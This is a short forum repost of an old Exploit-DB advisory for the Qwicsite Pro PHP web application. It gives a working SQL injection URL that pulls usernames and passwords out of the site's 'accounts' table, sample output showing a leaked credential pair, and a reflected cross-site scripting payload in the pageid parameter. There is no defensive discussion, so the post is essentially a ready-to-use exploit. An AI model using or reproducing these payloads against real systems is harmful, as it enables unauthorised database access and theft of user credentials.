Exploit qwicsite pro - SQL Injection / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6363
Проверка EDB
  1. Пройдено
Автор
CR@ZY_KING
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-09-04
Код:
By Cr@zy_King a.k.a t4cs1zkr4L


Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities


http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*


<!-- checkpageuser   - -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password) from
accounts/* -  - ::al3m::kinq -->


::Username::pass



http://localhost/?pageid=<script>alert("Cr@")</script>



www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]

# milw0rm.com [2008-09-04]
 
Источник
www.exploit-db.com

Похожие темы